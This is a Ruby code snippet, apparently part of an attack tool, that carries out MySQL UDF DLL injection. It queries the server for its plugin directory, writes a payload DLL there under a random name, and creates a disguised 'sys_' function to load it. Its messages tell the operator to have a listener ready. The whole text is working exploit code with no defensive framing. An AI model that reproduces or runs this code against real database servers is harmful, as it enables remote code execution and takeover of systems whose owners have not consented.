MySQL UDF DLL Injection

# Code Snippet continuation, by HR

# Determine Plugin Directory
# This is where we need to write UDF to
# Pass in the MySQL connection object (dbc)
def get_plugin_dir(dbc)
  begin
    q = dbc.query('SELECT @@plugin_dir;')
    q.each { |x| @pdir=x[0]; }
    if @pdir.nil?
      q = dbc.query("SHOW VARIABLES LIKE 'basedir';")
      q.each { |x| @pdir=x[1]; }
      plugpath = @pdir.split("\\").join("\\\\")
      plugpath += "\\\\lib\\\\plugin\\\\"
    else
      plugpath = @pdir.split("\\").join("\\\\")
      plugpath += "\\\\"
    end
    return plugpath
  rescue Mysql::Error => e
    puts "Problem determining the plugins directory!"
    puts "\t=> #{e}"
    puts "Sorry, can't continue without this piece....\n\n"
    exit 666;
  end
end

# Create new function tied to custom DLL
# Once created (and called) it should trigger the DLL payload
def create_custom_function(dbc, file)
  dll_name = randz(15) + ".dll"
  plugin_path = get_plugin_dir(dbc)
  @udf_dest = plugin_path.chomp + dll_name
  fake_function = 'sys_' + randz(5)

  # Upload our UDF DLL Payload file
  if write_bin_file(dbc, file, @udf_dest)
    begin
      puts "Payload DLL writen to disk!"
      puts "Creating function to trigger now...."
      puts "Make sure your listener is ready...."
      sleep(3)
      # Drop function if its already there, then create new
      q = dbc.query("DROP FUNCTION IF EXISTS #{fake_function};")
      q = dbc.query("CREATE FUNCTION #{fake_function} RETURNS string SONAME '#{dll_name}';")
      return fake_function
    rescue Mysql::Error => e
      puts "Error Triggered, Payload should have also been triggered!"
      return fake_function
    end
  end
end